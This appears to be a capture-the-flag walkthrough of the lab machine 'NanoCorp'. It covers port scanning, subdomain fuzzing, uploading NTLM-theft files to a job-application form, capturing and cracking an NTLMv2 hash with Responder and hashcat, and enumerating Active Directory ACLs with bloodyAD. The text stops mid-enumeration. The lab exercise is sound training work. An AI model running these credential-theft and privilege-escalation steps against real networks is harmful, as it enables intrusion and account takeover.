NanoCorp
by 0xW1LD
Enumeration
Scans
As usual we start off with an nmap port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Nanocorp
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-09 05:45:24Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5986/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after: 2026-04-06T23:18:43
| MD5: 2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
| SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
| -----BEGIN CERTIFICATE-----
| MIIDMDCCAhigAwIBAgIQIG1hb/WXAZBNVk/iii5EyjANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDDBFkYzAxLm5hbm9jb3JwLmh0YjAeFw0yNTA0MDYyMjU4NDNaFw0y
| NjA0MDYyMzE4NDNaMBwxGjAYBgNVBAMMEWRjMDEubmFub2NvcnAuaHRiMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvhk2VBmIaEaly06th345bTcNsYcV
| D4rgwzD861bdYfo3DYKG0XykF5u1O17P/jO7TUokAfQB2IeNTAb77ZU1iK1PdCCX
| bv6jeV+MEgsJcvCUSYdX5eEurSnDgTteegJ5APzUVgleNaFMkQi7rB9gG422AJov
| fJzCxPHm0irdfJt0cH5JRGg1+5zcm3A8FzQ1WxBS0KfmfMKCYhnFufpiUcFMtire
| azOyDb4IXFEpWuDVuPrr0O5GwWIiHlydtfY5u8+AeDaIEFHfP2qtN4T+6BEyadOT
| hdbPLxx53qFxAWVfoHjr6M9RWUHKEVmRBacBa4Jjj5VzEWt0IJM9Nq7/2QIDAQAB
| o24wbDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUF
| BwMBMBwGA1UdEQQVMBOCEWRjMDEubmFub2NvcnAuaHRiMB0GA1UdDgQWBBQaIgqw
| fFwJfesMFBU9Usbf0k55ODANBgkqhkiG9w0BAQsFAAOCAQEAY84V2Zwkjqqiraun
| KN+g7VoDri61Yn4U6DnVHt2h87gJRNVPukb64oAIqbTuyVRDe9CKtQo8SDul/x/Y
| GbNu0oHXYssqx37uowexR3AwoYkg1rLiRKik1cYbjawVjCUZ8ZEL1OLsMg362uaG
| hEvxeACIwiuoEpPXNWsLr4Vx44ImHMNVEeQg3luTTE/YcaProZO+/7TkB8yj1RbT
| D2hom7Eo8cGz5hVxCsHyv+KjUkWGC/prCEZXKgO+yHwc/ZGQIYnO0gEaNWnxlal5
| hFH4guGtiqkjjSQgPdSrCSxpEE1tHssCualeYyyMtxLq/dNLNSK+uRX+/A0/F7An
| VGJ53g==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53532/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57820/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57839/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 39598/tcp): CLEAN (Timeout)
| Check 2 (port 58820/tcp): CLEAN (Timeout)
| Check 3 (port 27537/udp): CLEAN (Timeout)
| Check 4 (port 62849/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-11-09T05:46:19
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Looks like we have a standard AD suite with some changes.
80 is running an apache webserver5986 is running which means we have winrms instead of just winrm
80 - Web Server
Visiting http://nanocorp.htb we find a cybersecurity website.
Looking around the only thing of interest would be the contact form.
however, we don’t get much feedback on any attempted web vulnerability so we can leave it for now.
Let’s start fuzzing for subdomains.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ffuf -u http://nanocorp.htb -H "Host: FUZZ.nanocorp.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -mc all -fc 301
/ ___\ / ___\ / ___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://nanocorp.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.nanocorp.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 301
________________________________________________
hire [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 352ms]
We can find the hire subdomain, let’s add this to our /etc/hosts file and take a look.
We are greeted by a simple application form with a file upload.
Seems we can upload a zip file.
User
Since we know it’s an Active Directory environment, let’s attempt to upload a zip file containing malicious ntlm theft files. We can try the ntlm theft methods shown on hacktricks.
First let’s create the files, I’ll make 3.
1
2
3
4
5
6
7
ls -lash
total 20K
4.0K drwxrwxr-x 2 kali kali 4.0K Nov 8 18:05 .
4.0K drwxrwxr-x 4 kali kali 4.0K Nov 8 18:04 ..
4.0K -rw-rw-r-- 1 kali kali 617 Nov 8 18:05 .library-ms
4.0K -rw-rw-r-- 1 kali kali 147 Nov 8 18:04 w1ld.asx
4.0K -rw-rw-r-- 1 kali kali 90 Nov 8 18:05 w1ld.lnk
Next let’s zip them up.
1
2
3
4
zip w1ld.zip * .[^.]*
adding: w1ld.asx (deflated 24%)
adding: w1ld.lnk (deflated 8%)
adding: .library-ms (deflated 48%)
Let’s upload this archive and start Responder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.61]
Responder IPv6 [dead:beef:2::103b]
Challenge set [random]
Dont Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Dont Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-71QK5W5Z1O7]
Responder Domain Name [5FPR.LOCAL]
Responder DCE-RPC Port [45530]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
After a bit of waiting we capture an NTLMv2 hash!
1
2
3
[SMB] NTLMv2-SSP Client : 10.129.130.72
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:4da0b584507943f8:4F9A62848A45767E82918738241F09A1:010100000000000000617B0BDA50DC0193312E6EBED8CF1F0000000002000800350046005000520001001E00570049004E002D003700310051004B003500570035005A0031004F00370004003400570049004E002D003700310051004B003500570035005A0031004F0037002E0035004600500052002E004C004F00430041004C000300140035004600500052002E004C004F00430041004C000500140035004600500052002E004C004F00430041004C000700080000617B0BDA50DC0106000400020000000800300030000000000000000000000000200000375C005BB695E935FABE32CABE0158D05BEC3D76F54109088DD1AB3B38D8301E0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360031000000000000000000
Let’s start cracking this using hashcat.
1
2
3
hashcat -m 5600 -a 0 web_svc.pem /usr/share/wordlists/rockyou.txt.gz
<SNIP>
WEB_SVC::NANOCORP:4da0b584507943f8:4f9a62848a45767e82918738241f09a1:010100000000000000617b0bda50dc0193312e6ebed8cf1f0000000002000800350046005000520001001e00570049004e002d003700310051004b003500570035005a0031004f00370004003400570049004e002d003700310051004b003500570035005a0031004f0037002e0035004600500052002e004c004f00430041004c000300140035004600500052002e004c004f00430041004c000500140035004600500052002e004c004f00430041004c000700080000617b0bda50dc0106000400020000000800300030000000000000000000000000200000375c005bb695e935fabe32cabe0158d05bec3d76f54109088dd1ab3b38d8301e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000:dksehdgh712!@#
We’ve got a successful crack so let’s now check our authentication to the domain.
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc ldap 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' -M whoami
LDAP 10.129.130.72 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.130.72 389 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
WHOAMI 10.129.130.72 389 DC01 Name: web_svc
WHOAMI 10.129.130.72 389 DC01 sAMAccountName: web_svc
WHOAMI 10.129.130.72 389 DC01 Enabled: Yes
WHOAMI 10.129.130.72 389 DC01 Password Never Expires: Yes
WHOAMI 10.129.130.72 389 DC01 User Principal Name: web_svc@nanocorp.htb
WHOAMI 10.129.130.72 389 DC01 Last logon: 2025-11-09 06:13:29 UTC
WHOAMI 10.129.130.72 389 DC01 Password Last Set: 2025-04-09 22:59:38 UTC
WHOAMI 10.129.130.72 389 DC01 Bad Password Count: 0
WHOAMI 10.129.130.72 389 DC01 Distinguished Name: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
WHOAMI 10.129.130.72 389 DC01 User SID: S-1-5-21-2261381271-1331810270-697239744-1103
We’ve got authentication to the domain, you can continue here by grabbing bloodhound data, however I’ll show a method to form a path without using bloodhound.
First we start by checking our writables.
1
2
3
4
5
6
7
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nanocorp,DC=htb
permission: WRITE
distinguishedName: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
permission: WRITE
Since we didn’t get a lot, there’s no real use in checking the details of the write permissions. So now what we can do is grab our SID to use as a reference for later.
1
2
3
4
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'web_svc' --attr objectSid
distinguishedName: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
objectSid: S-1-5-21-2261381271-1331810270-697239744-1103
Next let’s grab some ntSecurityDescriptors also known as SDs.
1
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get search --attr nTSecurityDescriptor > SDs.txt
Depending on the size of the environment grabbing SDs may take a while, so grab a coffee, in this case it was rather quick since we have a small environment.
Next we can use our SID to search against the SDs.
1
2
3
grep 'S-1-5-21-2261381271-1331810270-697239744-1103' SDs.txt -B 1
distinguishedName: CN=IT_Support,CN=Users,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:AI(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2261381271-1331810270-697239744-1103)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a55-1e2f-11d0-9819-00aa0040529b;;S-1-5-11)(A;;0x20014;;;S-1-5-21-2261381271-1331810270-697239744-1103)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;0x20094;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
Looks like we have a match on IT_Support group, let’s take a deeper look at this object.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'IT_Support' --resolve-sd
distinguishedName: CN=IT_Support,CN=Users,DC=nanocorp,DC=htb
cn: IT_Support
dSCorePropagationData: 2025-04-09 22:55:41+00:00
groupType: -2147483646
instanceType: 4
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
+ nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.0.Trustee: web_svc
+ nTSecurityDescriptor.ACL.0.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.0.ObjectType: Member
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.1.Right: READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.2.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.2.ObjectType: Send-To
+ nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
+ nTSecurityDescriptor.ACL.3.Trustee: web_svc
+ nTSecurityDescriptor.ACL.3.Right: GENERIC_EXECUTE|READ_PROP
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.4.Trustee: LOCAL_SYSTEM; ACCOUNT_OPERATORS; Domain Admins
nTSecurityDescriptor.ACL.4.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.4.ObjectType: Self
nTSecurityDescriptor.ACL.5.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.5.Trustee: AUTHENTICATED_USERS; PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: GENERIC_READ
nTSecurityDescriptor.ACL.5.ObjectType: Self
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.6.Right: READ_PROP
nTSecurityDescriptor.ACL.6.ObjectType: General-Information (property set); Remote-Access-Information (property set); Account-Restrictions (property set); Logon-Information (property set); Group-Membership (property set)
nTSecurityDescriptor.ACL.6.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.7.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.8.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.8.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.8.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.9.Right: READ_PROP
nTSecurityDescriptor.ACL.9.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; Computer
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.10.Right: READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.10.InheritedObjectType: Group
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.11.Right: WRITE_PROP
nTSecurityDescriptor.ACL.11.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.11.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.12.Right: GENERIC_READ
nTSecurityDescriptor.ACL.12.ObjectType: Self
nTSecurityDescriptor.ACL.12.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: GENERIC_READ
nTSecurityDescriptor.ACL.13.ObjectType: Self
nTSecurityDescriptor.ACL.13.InheritedObjectType: Group
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.14.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.14.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.15.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.16.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.16.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.16.ObjectType: Self
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.17.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.17.Right: LIST_CHILD
nTSecurityDescriptor.ACL.17.ObjectType: Self
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.18.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.18.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.18.ObjectType: Self
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
name: IT_Support
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
objectClass: top; group
objectGUID: 21e5793e-aca6-48f7-90b6-cd123bc3dd53
objectSid: S-1-5-21-2261381271-1331810270-697239744-3102
sAMAccountName: IT_Support
sAMAccountType: 268435456
uSNChanged: 77983
uSNCreated: 77964
whenChanged: 2025-04-09 22:55:41+00:00
whenCreated: 2025-04-09 22:54:07+00:00
Looks like we have a couple of permissions: Write Validated, Generic Execute, Read Property. The Write Validated permission is the most powerful as it allows us to add and remove objects from the group. But what use is this group to us? Well let’s check the SDs.txt for its SID.
1
2
3
4
5
6
grep 'S-1-5-21-2261381271-1331810270-697239744-3102' SDs.txt -B 1
distinguishedName: CN=monitoring_svc,OU=AD_Monitoring,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:(OA;;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;037088f8-0ae1-11d2-b422-00a0c968f939;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2261381271-1331810270-697239744-517)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;0x30;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;0x30;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a54-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a56-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;;S-1-5-11)(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-11)(OA;;RP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;RP;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b2-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;RC;;;S-1-5-11)(A;;0x20094;;;S-1-5-10)(A;;0xf01ff;;;S-1-5-18)(OA;CIID;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIID;0x20014;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;R